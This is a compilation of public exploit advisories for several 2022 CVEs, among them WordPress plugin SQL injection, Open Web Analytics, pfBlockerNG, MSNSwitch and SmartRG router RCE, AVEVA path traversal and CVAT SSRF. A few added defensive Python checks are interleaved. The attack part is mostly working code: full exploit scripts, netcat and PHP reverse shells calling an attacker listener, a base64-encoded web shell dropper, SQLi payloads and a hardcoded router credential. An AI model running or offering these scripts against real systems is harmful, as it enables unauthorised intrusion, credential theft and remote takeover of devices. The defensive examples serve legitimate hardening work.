# Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi
# Date: 14-08-2022
# Exploit Author: Rizacan Tufan
# Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated
# Software Link: https://wordpress.org/plugins/zephyr-project-manager/
# Vendor Homepage: https://zephyr-one.com/
# Version: 3.2.42
# Tested on: Windows, Linux
# CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c)
# Description
Zephyr Project Manager is a plug-in that helps you manage all your projects and tasks and get things done effectively.
It has been determined that, in most places throughout the application, the data coming from input fields is used in
the query without any sanitization or validation.
The details of the discovery are given below.
# Proof of Concept (PoC)
The details of the various SQL injections in the application are given below.
## Endpoint of Get Project Data
Sample Request:
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_projects
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
action=zpm_view_project&project_id=1&zpm_nonce=22858bf3a7
Payload:
---
Parameter: project_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=zpm_view_project&project_id=1 AND 4923=4923&zpm_nonce=22858bf3a7
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: action=zpm_view_project&project_id=1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=22858bf3a7
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: action=zpm_view_project&project_id=-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=22858bf3a7
---
## Endpoint of Get Task Data
Sample Request:
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 51
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
task_id=1&action=zpm_view_task&zpm_nonce=22858bf3a7
Payload:
---
Parameter: task_id (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: task_id=1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=zpm_view_task&zpm_nonce=22858bf3a7
---
## Endpoint of New Task
Sample Request:
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 337
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
task_name=test&task_description=test&task_project=1&task_due_date=&task_start_date=&team=0&priority=priority_none&status=test&type=default&recurrence%5Btype%5D=default&parent-id=-1&action=zpm_new_task&zpm_nonce=22858bf3a7
Payload:
---
Parameter: task_project (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: task_name=test&task_description=test&task_project=1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=&task_start_date=&team=0&priority=priority_none&status=rrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=default&recurrence[type]=default&parent-id=-1&action=zpm_new_task&zpm_nonce=22858bf3a7
---
Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
Exploit Author: Jens Regel (CRISEC IT-Security)
Date: 11/11/2022
CVE: CVE-2022-23854
Version: Access Anywhere Secure Gateway versions 2020 R2 and older
Proof of Concept:
GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1
HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
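The traversal above works because the path is percent-encoded twice (`%252e` decodes to `%2e`, which decodes to `.`), so a filter that decodes once and looks for `..` sees nothing suspicious. The following is an added example, not code from the advisory or from the vendor: it contrasts that weak single-decode check with a check that decodes until the path stops changing, treats backslashes as separators, and only then resolves the path against the document root. The document root `/var/www` is an assumption for the illustration; the request path is the one shown in the advisory.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for the illustration; the real gateway's layout is not on the page.
WEB_ROOT = "/var/www"

# The request path from the advisory: ten double-encoded "..\" segments (%252e -> %2e -> '.', %255c -> %5c -> '\').
TRAVERSAL_REQUEST = "/AccessAnywhere/" + "%252e%252e%255c" * 10 + "windows%255cwin.ini"


def fully_decode(path, max_rounds=5):
    """Percent-decode until the text stops changing; nested encoding is exactly the bypass shown above."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            return path
        path = decoded
    raise ValueError("too many encoding layers")


def naive_has_dotdot(request_path):
    """The weak check: decode once and look for '..'. One decode of %252e yields '%2e', so it misses the payload."""
    return ".." in unquote(request_path)


def resolve_request_path(request_path):
    """Decode completely, treat backslashes as separators, then collapse '.' and '..' against the root."""
    decoded = fully_decode(request_path).replace("\\", "/")
    return posixpath.normpath(posixpath.join(WEB_ROOT, decoded.lstrip("/")))


def is_inside_root(request_path):
    """Serve only paths that still sit under WEB_ROOT after full normalisation."""
    target = resolve_request_path(request_path)
    return target == WEB_ROOT or target.startswith(WEB_ROOT + "/")


if __name__ == "__main__":
    print("naive check sees '..':", naive_has_dotdot(TRAVERSAL_REQUEST))
    print("resolves to:", resolve_request_path(TRAVERSAL_REQUEST))
    print("inside root:", is_inside_root(TRAVERSAL_REQUEST))
```

The containment test on the resolved path is the part that matters: even if a future encoding trick slips past `fully_decode`, a file outside `WEB_ROOT` is still refused because the decision is made on the final filesystem path, not on the request string.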
Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Execution (RCE)
Google Dork: n/a
Date: 9/1/2022
Exploit Author: Eli Fulkerson
Vendor Homepage: https://www.msnswitch.com/
Version: MNT.2408
Tested on: MNT.2408 firmware
CVE: CVE-2022-32429
```python
#!/usr/bin/python3
"""
POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.
Configuration dump only requires HTTP access.
Full RCE requires you to be on the same subnet as the device.
"""
import requests
import sys
import urllib.parse
import readline
import random
import string

# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST
LISTENER_HOST = "192.168.EDIT.ME"
LISTENER_PORT = 3434

# target msnswitch
TARGET = "192.168.EDIT.ME2"
PORT = 80

USERNAME = None
PASSWORD = None

"""
First vulnerability, unauthenticated configuration/credential dump
"""
if USERNAME == None or PASSWORD == None:
    # lets just ask
    hack_url = f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh"
    session = requests.session()
    data = session.get(hack_url)
    for each in data.text.split('\n'):
        key = None
        val = None
        try:
            key = each.strip().split('=')[0]
            val = each.strip().split('=')[1]
        except:
            pass
        if key == "Account1":
            USERNAME = val
        if key == "Password1":
            PASSWORD = val

"""
Second vulnerability, authenticated command execution
This only works on the local lan.
for full reverse shell, modify and upload netcat busybox shell script to /tmp:
shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f
download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp
ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox
"""
session = requests.session()

# initial login, establishes our Cookie
burp0_url = f"http://{TARGET}:{PORT}/goform/login"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD}
session.post(burp0_url, headers=burp0_headers, data=burp0_data)

# get our csrftoken
burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp"
data = session.get(burp0_url)
csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0]

while True:
    CMD = input('x:')
    CMD_u = urllib.parse.quote_plus(CMD)
    filename = ''.join(random.choice(string.ascii_letters) for _ in range(25))
    try:
        hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F(unknown)%3F&csrftoken={csrftoken}"
        session.get(hack_url, timeout=0.01)
    except requests.exceptions.ReadTimeout:
        pass
```
# Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE)
# Date: 2022-08-30
# Exploit Author: Jacob Ebben
# Vendor Homepage: https://www.openwebanalytics.com/
# Software Link: https://github.com/Open-Web-Analytics
# Version: <1.7.4
# Tested on: Linux
# CVE : CVE-2022-24637
```python
import argparse
import requests
import base64
import re
import random
import string
import hashlib
from termcolor import colored


def print_message(message, type):
    if type == 'SUCCESS':
        print('[' + colored('SUCCESS', 'green') + '] ' + message)
    elif type == 'INFO':
        print('[' + colored('INFO', 'blue') + '] ' + message)
    elif type == 'WARNING':
        print('[' + colored('WARNING', 'yellow') + '] ' + message)
    elif type == 'ALERT':
        print('[' + colored('ALERT', 'yellow') + '] ' + message)
    elif type == 'ERROR':
        print('[' + colored('ERROR', 'red') + '] ' + message)


def get_normalized_url(url):
    if url[-1] != '/':
        url += '/'
    if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
        url = "http://" + url
    return url


def get_proxy_protocol(url):
    if url[0:8].lower() == 'https://':
        return 'https'
    return 'http'


def get_random_string(length):
    chars = string.ascii_letters + string.digits
    return ''.join(random.choice(chars) for i in range(length))


def get_cache_content(cache_raw):
    regex_cache_base64 = r'\*(\w*)\*'
    regex_result = re.search(regex_cache_base64, cache_raw)
    if not regex_result:
        print_message('The provided URL does not appear to be vulnerable ...', "ERROR")
        exit()
    else:
        cache_base64 = regex_result.group(1)
        return base64.b64decode(cache_base64).decode("ascii")


def get_cache_username(cache):
    regex_cache_username = r'"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"'
    return re.search(regex_cache_username, cache).group(1)


def get_cache_temppass(cache):
    regex_cache_temppass = r'"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"'
    return re.search(regex_cache_temppass, cache).group(1)


def get_update_nonce(url):
    try:
        update_nonce_request = session.get(url, proxies=proxies)
        regex_update_nonce = r'owa_nonce" value="(\w*)"'
        update_nonce = re.search(regex_update_nonce, update_nonce_request.text).group(1)
    except Exception as e:
        print_message('An error occurred when attempting to update config!', "ERROR")
        print(e)
        exit()
    else:
        return update_nonce


parser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)')
parser.add_argument('TARGET', type=str,
                    help='Target URL (Example: http://localhost/owa/ or https://victim.xyz:8000/)')
parser.add_argument('ATTACKER_IP', type=str,
                    help='Address for reverse shell listener on attacking machine')
parser.add_argument('ATTACKER_PORT', type=str,
                    help='Port for reverse shell listener on attacking machine')
parser.add_argument('-u', '--username', default="admin", type=str,
                    help='The username to exploit (Default: admin)')
parser.add_argument('-p', '--password', default=get_random_string(32), type=str,
                    help='The new password for the exploited user')
parser.add_argument('-P', '--proxy', type=str,
                    help='HTTP proxy address (Example: http://127.0.0.1:8080/)')
parser.add_argument('-c', '--check', action='store_true',
                    help='Check vulnerability without exploitation')
args = parser.parse_args()

base_url = get_normalized_url(args.TARGET)
login_url = base_url + "index.php?owa_do=base.loginForm"
password_reset_url = base_url + "index.php?owa_do=base.usersPasswordEntry"
update_config_url = base_url + "index.php?owa_do=base.optionsGeneral"
username = args.username
new_password = args.password
reverse_shell = '<?php $sock=fsockopen("' + args.ATTACKER_IP + '",' + args.ATTACKER_PORT + ');$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'
shell_filename = get_random_string(8) + '.php'
shell_url = base_url + 'owa-data/caches/' + shell_filename

if args.proxy:
    proxy_url = get_normalized_url(args.proxy)
    proxy_protocol = get_proxy_protocol(proxy_url)
    proxies = {proxy_protocol: proxy_url}
else:
    proxies = {}

session = requests.Session()

try:
    mainpage_request = session.get(base_url, proxies=proxies)
except Exception as e:
    print_message('Could not connect to "' + base_url, "ERROR")
    exit()
else:
    print_message('Connected to "' + base_url + '" successfully!', "SUCCESS")

if 'Open Web Analytics' not in mainpage_request.text:
    print_message('Could not confirm whether this website is hosting OWA! Continuing exploitation...', "WARNING")
elif 'version=1.7.3' not in mainpage_request.text:
    print_message('Could not confirm whether this OWA instance is vulnerable! Continuing exploitation...', "WARNING")
else:
    print_message('The webserver indicates a vulnerable version!', "ALERT")

try:
    data = {
        "owa_user_id": username,
        "owa_password": username,
        "owa_action": "base.login"
    }
    session.post(login_url, data=data, proxies=proxies)
except Exception as e:
    print_message('An error occurred during the login attempt!', "ERROR")
    print(e)
    exit()
else:
    print_message('Attempting to generate cache for "' + username + '" user', "INFO")

print_message('Attempting to find cache of "' + username + '" user', "INFO")
found = False
for key in range(100):
    user_id = 'user_id' + str(key)
    userid_hash = hashlib.md5(user_id.encode()).hexdigest()
    filename = userid_hash + '.php'
    cache_url = base_url + "owa-data/caches/" + str(key) + "/owa_user/" + filename
    cache_request = requests.get(cache_url, proxies=proxies)
    if cache_request.status_code != 200:
        continue
    cache_raw = cache_request.text
    cache = get_cache_content(cache_raw)
    cache_username = get_cache_username(cache)
    if cache_username != username:
        print_message('The temporary password for a different user was found. "' + cache_username + '": ' + get_cache_temppass(cache), "INFO")
        continue
    else:
        found = True
        break

if not found:
    print_message('No cache found. Are you sure "' + username + '" is a valid user?', "ERROR")
    exit()

cache_temppass = get_cache_temppass(cache)
print_message('Found temporary password for user "' + username + '": ' + cache_temppass, "INFO")

if args.check:
    print_message('The system appears to be vulnerable!', "ALERT")
    exit()

try:
    data = {
        "owa_password": new_password,
        "owa_password2": new_password,
        "owa_k": cache_temppass,
        "owa_action": "base.usersChangePassword"
    }
    session.post(password_reset_url, data=data, proxies=proxies)
except Exception as e:
    print_message('An error occurred when changing the user password!', "ERROR")
    print(e)
    exit()
else:
    print_message('Changed the password of "' + username + '" to "' + new_password + '"', "INFO")

try:
    data = {
        "owa_user_id": username,
        "owa_password": new_password,
        "owa_action": "base.login"
    }
    session.post(login_url, data=data, proxies=proxies)
except Exception as e:
    print_message('An error occurred during the login attempt!', "ERROR")
    print(e)
    exit()
else:
    print_message('Logged in as "' + username + '" user', "SUCCESS")

nonce = get_update_nonce(update_config_url)
try:
    log_location = "/var/www/html/owa/owa-data/caches/" + shell_filename
    data = {
        "owa_nonce": nonce,
        "owa_action": "base.optionsUpdate",
        "owa_config[base.error_log_file]": log_location,
        "owa_config[base.error_log_level]": 2
    }
    session.post(update_config_url, data=data, proxies=proxies)
except Exception as e:
    print_message('An error occurred when attempting to update config!', "ERROR")
    print(e)
    exit()
else:
    print_message('Creating log file', "INFO")

nonce = get_update_nonce(update_config_url)
try:
    data = {
        "owa_nonce": nonce,
        "owa_action": "base.optionsUpdate",
        "owa_config[shell]": reverse_shell
    }
    session.post(update_config_url, data=data, proxies=proxies)
except Exception as e:
    print_message('An error occurred when attempting to update config!', "ERROR")
    print(e)
    exit()
else:
    print_message('Wrote payload to log file', "INFO")

try:
    session.get(shell_url, proxies=proxies)
except Exception as e:
    print(e)
else:
    print_message('Triggering payload! Check your listener!', "SUCCESS")
    print_message('You can trigger the payload again at "' + shell_url + '"', "INFO")
```
# Exploit Title: Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: inurl:"/wp-content/plugins/imagemagick-engine/"
# Date: Thursday, September 1, 2022
# Exploit Author: ABDO10
# Vendor Homepage: https://wordpress.org/plugins/imagemagick-engine/
# Software Link: https://github.com/orangelabweb/imagemagick-engine/
# Version: <= 1.7.4
# Tested on: windows 10
-- vulnerable section
https://github.com/orangelabweb/imagemagick-engine/commit/73c1d837e0a23870e99d5d1470bd328f8b2cbcd4#diff-83bcdfbbb7b8eaad54df4418757063ad8ce7f692f189fdce2f86b2fe0bcc0a4dR529
-- payload on windows: d&calc.exe&anything
-- on unix : notify-send "done"
-- exploit :
GET /wp/wordpress/wp-admin/admin-ajax.php?action=ime_test_im_path&cli_path=[payload] HTTP/1.1
Host: localhost
Cookie: wordpress_sec_xx=; wp-settings-time-1=; wordpress_test_cookie=; wordpress_logged_in_xx=somestuff
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/wp/wordpress/wp-admin/options-general.php?page=imagemagick-engine
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
# Exploit Title: IOTransfer V4 - Unquoted Service Path
# Exploit Author: BLAY ABU SAFIAN (Inveteck Global)
# Discovery Date: 2022-28-07
# Vendor Homepage: http://www.iobit.com/en/index.php
# Software Link: https://iotransfer.itopvpn.com/download/
# Tested Version: V4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows Server 2019 Standard Evaluation
# CVE: CVE-2022-37197
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
IOTransfer Updater IOTUpdaterSvc C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe Auto
C:\>sc qc IOTUpdaterSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: IOTUpdaterSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : IOTransfer Updater
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>systeminfo
OS Name: Microsoft Windows Server 2019 Standard Evaluation
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
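The `wmic | findstr` pipeline above finds the issue interactively; for fleet-wide auditing it helps to have the same logic as a function that also reports which path prefixes Windows would probe before reaching the real binary (the locations whose ACLs must be verified). The following is an added example, not part of the advisory or of the vendor's software. The service records are constructed to mirror the wmic columns shown above; only the IOTransfer entry is taken from the page.

```python
import re

# Constructed service records modelled on the wmic columns used above (Name, DisplayName, PathName, StartMode).
SAMPLE_SERVICES = [
    {"name": "IOTUpdaterSvc", "displayname": "IOTransfer Updater",
     "pathname": r"C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe", "startmode": "Auto"},
    {"name": "QuotedSvc", "displayname": "Properly quoted service (constructed)",
     "pathname": r'"C:\Program Files\Quoted\agent.exe" -service', "startmode": "Auto"},
    {"name": "NoSpaceSvc", "displayname": "Path without spaces (constructed)",
     "pathname": r"C:\Tools\agent.exe", "startmode": "Auto"},
    {"name": "Spooler", "displayname": "Print Spooler",
     "pathname": r"C:\Windows\System32\spoolsv.exe", "startmode": "Auto"},
]


def unquoted_path_candidates(pathname):
    """For an unquoted path whose executable part contains spaces, return the files Windows
    would try, in order, before the intended binary. Returns [] when the path is quoted or
    contains no spaces, i.e. when there is nothing to fix."""
    p = pathname.strip()
    if p.startswith('"'):
        return []
    # Only the executable part matters; trailing arguments after ".exe" are not part of the lookup.
    m = re.match(r"(?i)(.*?\.exe)", p)
    exe = m.group(1) if m else p
    if " " not in exe:
        return []
    candidates = [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]
    candidates.append(exe)
    return candidates


def find_unquoted_services(services):
    """Same filter as the wmic pipeline: auto-start, outside C:\\Windows, unquoted with spaces."""
    findings = []
    for svc in services:
        path = svc["pathname"]
        if svc["startmode"].lower() != "auto" or path.lower().startswith("c:\\windows\\"):
            continue
        candidates = unquoted_path_candidates(path)
        if candidates:
            findings.append((svc["name"], candidates))
    return findings


if __name__ == "__main__":
    for name, candidates in find_unquoted_services(SAMPLE_SERVICES):
        print(name)
        for c in candidates:
            print("   would probe:", c)
```

On a live host the records would come from `wmic service get name,displayname,pathname,startmode` or `Get-CimInstance Win32_Service`. The fix is to quote the binary path, for example `sc config IOTUpdaterSvc binPath= "\"C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe\""`, and to confirm that non-administrators cannot write to `C:\` or `C:\Program Files (x86)\`.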
# Exploit Title: pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)
# Shodan Results: https://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22
# Date: 5th of September 2022
# Exploit Author: IHTeam
# Vendor Homepage: https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html
# Software Link: https://github.com/pfsense/FreeBSD-ports/pull/1169
# Version: 2.1.4_26
# Tested on: pfSense 2.6.0
# CVE : CVE-2022-31814
# Original Advisory: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/
```python
#!/usr/bin/env python3
import argparse
import requests
import time
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

parser = argparse.ArgumentParser(description="pfBlockerNG <= 2.1.4_26 Unauth RCE")
parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: https://192.168.1.111:443/")
args = parser.parse_args()
url = args.url
shell_filename = "system_advanced_control.php"


def check_endpoint(url):
    response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)
    if response.status_code == 200:
        print("[+] pfBlockerNG is installed")
    else:
        print("\n[-] pfBlockerNG not installed")
        sys.exit()


def upload_shell(url, shell_filename):
    payload = {"Host": "' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}
    print("[/] Uploading shell...")
    response = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False)
    time.sleep(2)
    response = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False)
    if ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')):
        print("[+] Upload succeeded")
    else:
        print("\n[-] Error uploading shell. Probably patched ", response.content)
        sys.exit()


def interactive_shell(url, shell_filename, cmd):
    response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False)
    print(str(response.text) + "\n")


def delete_shell(url, shell_filename):
    delcmd = "rm /usr/local/www/system_advanced_control.php"
    response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False)
    print("\n[+] Shell deleted")


check_endpoint(url)
upload_shell(url, shell_filename)
try:
    while True:
        cmd = input("# ")
        interactive_shell(url, shell_filename, cmd)
except:
    delete_shell(url, shell_filename)
```
# Exploit Title: SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)
# Date: 13/06/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://adtran.com
# Version: 2.5.15 / 2.6.13 (confirmed)
# Tested on: SR506n (2.5.15) & SR510n (2.6.13)
# CVE : CVE-2022-37661
```python
import requests
from subprocess import Popen, PIPE

router_host = "http://192.168.1.1"
authorization_header = "YWRtaW46QWRtMW5ATDFtMyM="
lhost = "lo"
lport = 80
payload_port = 81


def main():
    e_proc = Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tmp/s | nc {lhost} {lport} > /tmp/s"], stdout=PIPE)
    Popen(["nc", "-nlvp", f"{payload_port}"], stdin=e_proc.stdout)
    send_payload(f"|nc {lhost} {payload_port}|sh")
    print("done.. check shell")


def get_session():
    url = router_host + "/admin/ping.html"
    headers = {"Authorization": "Basic {}".format(authorization_header)}
    r = requests.get(url, headers=headers).text
    i = r.find("&sessionKey=") + len("&sessionKey=")
    s = ""
    while r[i] != "'":
        s = s + r[i]
        i = i + 1
    return s


def send_payload(payload):
    print(payload)
    url = router_host + "/admin/pingHost.cmd"
    headers = {"Authorization": "Basic {}".format(authorization_header)}
    params = {"action": "add", "targetHostAddress": payload, "sessionKey": get_session()}
    requests.get(url, headers=headers, params=params).text


main()
```
# Exploit Title: CVAT 2.0 - SSRF (Server Side Request Forgery)
# Exploit Author: Emir Polat
# Vendor Homepage: https://github.com/opencv/cvat
# Version: < 2.0.0
# Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
# CVE: CVE-2022-31188
# Description:
# CVAT is an open-source interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 are subject to a server-side request forgery (SSRF) vulnerability.
# Validation has been added to the URLs used in the affected code path in version 2.0.0. Users are advised to upgrade.
POST /api/v1/tasks/2/data HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: application/json, text/plain, */*
Accept-Language:en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 06d88f739a10c7533991d8010761df721b790b7
X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGV
Content-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436
Content-Length: 569
Origin: http://localhost:8080
Connection: close
Referer:http://localhost:8080/tasks/create
Cookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dned
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="remote files[0]"
http://localhost:8081
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name=" image quality"
170
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="use zip chunks"
true
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="use cache"
true
-----------------------------251652214142138553464236533436--
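The `remote files[0]` field above makes the server fetch an arbitrary URL on the caller's behalf, here `http://localhost:8081`, a port that is only reachable from inside the deployment. The validation the advisory says 2.0.0 introduced is, in general form, a check that the URL's scheme is allowed and that every address the host resolves to is publicly routable. The code below is an added example of that check, not CVAT's own implementation. The DNS resolver is injectable, and a constructed name table is included so the example runs offline; the hostnames and addresses in that table are made up for the illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed name table so the example runs without network access.
CONSTRUCTED_DNS = {
    "localhost": ["127.0.0.1"],
    "intranet.corp": ["10.0.0.5"],
    "images.example.com": ["93.184.216.34"],
}


def constructed_resolver(host):
    """Stand-in for socket.gethostbyname_ex: returns (name, aliases, addresses) or raises gaierror."""
    if host not in CONSTRUCTED_DNS:
        raise socket.gaierror(socket.EAI_NONAME, "constructed resolver: unknown host")
    return host, [], CONSTRUCTED_DNS[host]


def is_public_ip(ip_text):
    """True only for globally routable unicast addresses; loopback, RFC 1918, link-local etc. are rejected."""
    addr = ipaddress.ip_address(ip_text)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_remote_file_url(url, resolver=socket.gethostbyname_ex):
    """Return (allowed, reason). Every address the name maps to must be public, not just the first."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        ips = [str(ipaddress.ip_address(host))]          # literal IPv4/IPv6 address
    except ValueError:
        try:
            ips = resolver(host)[2]                       # hostname: resolve all addresses
        except OSError:
            return False, "hostname does not resolve"
    for ip in ips:
        if not is_public_ip(ip):
            return False, "resolves to non-public address " + ip
    return True, "ok"


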